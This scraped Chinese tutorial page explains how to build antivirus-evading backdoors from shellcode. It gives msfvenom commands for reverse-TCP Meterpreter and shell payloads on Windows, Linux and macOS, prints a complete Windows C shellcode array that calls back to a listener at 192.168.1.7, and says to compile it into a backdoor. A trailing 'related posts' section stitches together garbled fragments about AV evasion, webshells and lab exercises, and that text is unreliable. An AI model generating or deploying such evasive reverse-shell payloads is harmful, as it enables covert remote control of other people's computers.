2. 程式人生 > >使用ShellCode打造免殺payload

使用ShellCode打造免殺payload

阿新 發佈:2019-03-19
spa for win 攻擊機 平臺 fin window mac sig

1.生成不同平臺下的shellCode.

windows shellcode:

msfvenom -a x86 --platform Windows -p windows/meterpreter/reverse_tcp LHOST= 攻擊機IP LPORT=攻擊機端口 -f c 

[root@localhost ~]# msfvenom -a x86 --platform Windows -p windows/meterpreter/reverse_tcp LHOST=192.168.1.7 LPORT=999
8  -f c
No encoder or badchars specified, outputting raw payload
Payload size: 
 
341 bytes
Final size of c file: 1457 bytes
unsigned char buf[] =
"\xfc\xe8\x82\x00\x00\x00\x60\x89\xe5\x31\xc0\x64\x8b\x50\x30"
"\x8b\x52\x0c\x8b\x52\x14\x8b\x72\x28\x0f\xb7\x4a\x26\x31\xff"
"\xac\x3c\x61\x7c\x02\x2c\x20\xc1\xcf\x0d\x01\xc7\xe2\xf2\x52"
"\x57\x8b\x52\x10\x8b\x4a\x3c\x8b\x4c\x11\x78\xe3\x48\x01\xd1
 
"
"\x51\x8b\x59\x20\x01\xd3\x8b\x49\x18\xe3\x3a\x49\x8b\x34\x8b"
"\x01\xd6\x31\xff\xac\xc1\xcf\x0d\x01\xc7\x38\xe0\x75\xf6\x03"
"\x7d\xf8\x3b\x7d\x24\x75\xe4\x58\x8b\x58\x24\x01\xd3\x66\x8b"
"\x0c\x4b\x8b\x58\x1c\x01\xd3\x8b\x04\x8b\x01\xd0\x89\x44\x24"
"\x24\x5b\x5b\x61\x59\x5a\x51\xff\xe0\x5f\x5f\x5a\x8b\x12\xeb
 
"
"\x8d\x5d\x68\x33\x32\x00\x00\x68\x77\x73\x32\x5f\x54\x68\x4c"
"\x77\x26\x07\x89\xe8\xff\xd0\xb8\x90\x01\x00\x00\x29\xc4\x54"
"\x50\x68\x29\x80\x6b\x00\xff\xd5\x6a\x0a\x68\xc0\xa8\x01\x07"
"\x68\x02\x00\x27\x0e\x89\xe6\x50\x50\x50\x50\x40\x50\x40\x50"
"\x68\xea\x0f\xdf\xe0\xff\xd5\x97\x6a\x10\x56\x57\x68\x99\xa5"
"\x74\x61\xff\xd5\x85\xc0\x74\x0a\xff\x4e\x08\x75\xec\xe8\x67"
"\x00\x00\x00\x6a\x00\x6a\x04\x56\x57\x68\x02\xd9\xc8\x5f\xff"
"\xd5\x83\xf8\x00\x7e\x36\x8b\x36\x6a\x40\x68\x00\x10\x00\x00"
"\x56\x6a\x00\x68\x58\xa4\x53\xe5\xff\xd5\x93\x53\x6a\x00\x56"
"\x53\x57\x68\x02\xd9\xc8\x5f\xff\xd5\x83\xf8\x00\x7d\x28\x58"
"\x68\x00\x40\x00\x00\x6a\x00\x50\x68\x0b\x2f\x0f\x30\xff\xd5"
"\x57\x68\x75\x6e\x4d\x61\xff\xd5\x5e\x5e\xff\x0c\x24\x0f\x85"
"\x70\xff\xff\xff\xe9\x9b\xff\xff\xff\x01\xc3\x29\xc6\x75\xc1"
"\xc3\xbb\xf0\xb5\xa2\x56\x6a\x00\x53\xff\xd5";
[root@localhost ~]#

linux shellcode:

msfvenom -a x86 --platform Linux -p linux/x86/meterpreter/reverse_tcp LHOST=攻 擊機IP LPORT=攻擊機端口 -f c

mac shellcode:

msfvenom -a x86 --platform osx -p osx/x86/shell_reverse_tcp LHOST=攻擊機IP LPORT=攻擊機端口 -f c

2.放入編譯器,編譯生成後門...

使用ShellCode打造免殺payload

相關推薦

使用MSF生成的shellcode打造payload

環境: 1.Kali攻擊機IP:192.168.114.140 2.使用win7生成exe 步驟: 使用msfvenom生成shellcode : msfvenom -pwindows/meterpreter/reverse_http lhost=192.168.114.1

使用ShellCode打造payload

spa for win 攻擊機 平臺 fin window mac sig 1.生成不同平臺下的shellCode. windows shellcode: msfvenom -a x86 --platform Windows -p windows/meterpr

使用shellcode打造MSFpayloadshellcode載入技術

0x00 前言    經常有同學提及MSF payload的免殺問題,其實除了Veil之處,還有另一種比較輕巧的方案可以打造免殺的payload,那就是shellcode。 0x01 從哪裡開始    shellcode是什麼,可以去drops搜尋學習,但這並不是本文的重點

[原創]CS & MSF Shellcode一鍵工具

CobaltStrike & Metasploit  Shellcode一鍵免殺工具 作者: K8哥哥 圖片   1個月前該工具生成的exe免殺所有殺軟,現在未測應該還能過90%的殺軟吧。 可選.net版本為系統安裝對應版本,1.0僅支援.net EXE生成。 後續

shellcode (一)

### 工具免殺 選擇了幾個簡單或者近期還有更新的免殺工具進行學習 #### ShellcodeWrapper 專案地址 https://github.com/Arno0x/ShellcodeWrapper 該工具的原理是使用異或加密或者aes加密,做到混淆,進行免殺。 先使用msfvenom生成

整理的最新WebSHell (php過狗一句話,過狗菜刀,2016過狗一句話,2016php一句話)

一句話木馬中國菜刀下載,基於原版中國菜刀優化版20160309.下載地址:http://download.csdn.net/detail/settoken/9457567https://pan.baidu.com/s/1jHoJxHWChina chopperhttps://pan.baidu.com/s/1

【黑客攻防】讀書筆記12 - 指針與數組

就是 process rcp 使用 運算 邏輯 內存 2.3 [1] 1、指針與數組 C源碼 前兩組printf()函數是以指針方式訪問數組nArray中的數據的,而後兩組printf()函數則是使用數組下標的方式訪問數組nArray中的數據的。 int _tmain(in

網絡對抗 Exp3 原理與實踐 20154311 王卓然

下載軟件 get 改變 網站 加密 純手工 com 代碼 操作模式 Exp3 免殺原理與實踐 一、基礎問題回答 (1)殺軟是如何檢測出惡意代碼的? ①基於特征碼的檢測:AV軟件廠商通過檢測一個可執行文件是否包含一段與特征碼庫中相匹配的特征碼從而判斷是

2017-2018-4 20155317《網絡對抗技術》EXP3 原理與實踐

運行 log jar idt 連通 進行 all 結果 暫時 2017-2018-4 20155317《網絡對抗技術》EXP3 免殺原理與實踐 一、問題回答 (1)殺軟是如何檢測出惡意代碼的? (2)免殺是做什麽? (3)免殺的基本方法有哪些? 2.實踐 (1) 正確

20155217《網絡對抗》Exp03 原理與實踐

pre 使用 程序 use cnblogs 多次 scan www. 變化 20155217《網絡對抗》Exp03 免殺原理與實踐 實踐內容 正確使用msf編碼器,msfvenom生成如jar之類的其他文件,veil-evasion,自己利用shellcode編程等免殺工

20154307《網絡對抗》Exp3 原理與實踐

mark 我們 blocks 意思 釣魚 class 做了 更改權限 asio 20154307《網絡對抗》Exp3 免殺原理與實踐 一、基礎問題回答 (1)殺軟是如何檢測出惡意代碼的? 基於特征碼的檢測:殺毒軟件檢測到有程序包含的特征碼與其特征碼庫的代碼相匹配,就會把該程

Exp3 原理與實踐20154302薛師凡

代碼 AR 軟件 可執行文件 別了 模板生成 倒序 即使 get Exp3 免殺原理與實踐20154302薛師凡 一、實踐目標與內容 利用多種工具實現實現惡意代碼免殺 在另一臺電腦上,殺軟開啟的情況下,實現運行後門程序並回連成功。 在保證後門程序功能的情況下實現殺軟共存。

Exp3 原理與實踐

asi 目標 專業 http lac 基礎 put 源文件 是個 一、基礎問題回答 (1)殺軟是如何檢測出惡意代碼的? -檢測特征碼 -基於行為檢測 -啟發式檢測類似 (2)免殺是做什麽? 使惡意軟件不被AV檢

20155232《網絡對抗》Exp3 原理與實踐

分享圖片 alt 特征碼 apt 基本 什麽 簡單介紹 主機 介紹 20155232《網絡對抗》Exp3 免殺原理與實踐 問題回答 1.基礎問題回答 (1)殺軟是如何檢測出惡意代碼的? 基於特征碼的檢測 特征碼:一段特征碼就是一段或多段數據。 如果一個可執行文件(或其

20155202張旭 Exp3 原理與實踐

ever 難受 virus 分片 告訴 kali 基於 文件夾 梳理 20155202張旭 Exp3 免殺原理與實踐 AV廠商檢測惡意軟件的方式主流的就三種: 基於特征碼的檢測 啟發式惡意軟件檢測 基於行為的惡意軟件檢測 我們要做的就是讓我們的惡意軟件沒法被這三種方式找到

20155320 Exp3 原理與實踐

可執行 惡意代碼 執行 AR 後門 lock 函數 工具 文件復制 20155320 Exp3 免殺原理與實踐 免殺 一般是對惡意軟件做處理,讓它不被殺毒軟件所檢測。也是滲透測試中需要使用到的技術。 【基礎問題回答】 (1)殺軟是如何檢測出惡意代碼的? 1.通過行

20155219付穎卓 Exp3 原理與實踐

但是 遇到 有一個 執行文件 圖書館 是個 alt .cn 現在 1.基礎問題回答 (1)殺軟是如何檢測出惡意代碼的? 殺毒軟件有一個病毒的特征碼庫,通過識別惡意代碼的特征碼或者特征片段檢測惡意代碼 殺毒軟件通過動態檢測對象文件的行為來識別惡意代碼,如果他的行為在一定程度

2017-2018-2 20155230《網絡對抗技術》實驗3:原理與實踐

語言 code 編碼 病毒 div 就是 加密 網絡 殺毒軟件 基礎問題回答 1、殺軟是如何檢測出惡意代碼的? 殺軟檢測惡意代碼主要有三種方式: ①特征碼的檢測:殺毒軟件的病毒庫記錄了一些惡意軟件的特征碼,這些特征碼由一個不大於64字節的字符串組成,且是只有該病毒內

20155338《網絡對抗》Exp3 原理與實踐

調用 編寫 上傳 權限 免殺 編譯運行 tcp 檢查 語言 20155338《網絡對抗》Exp3 免殺原理與實踐 實驗過程 一、免殺效果參考基準 Kali使用上次實驗msfvenom產生後門的可執行文件,上傳到老師提供的網址http://www.virscan.org/上進

20155220 網絡攻防技術 實驗三 原理與實踐

基於 back 網絡攻防 lis 方法 由於 原理 使用 生成可執行文件 網絡攻防技術 實驗三 免殺原理與實踐 使用msf生成後門程序的檢測 首先我們對上次實驗生成的後門exe,利用VirSCAN進行檢測 然後我們利用msfvenom -p java/meterp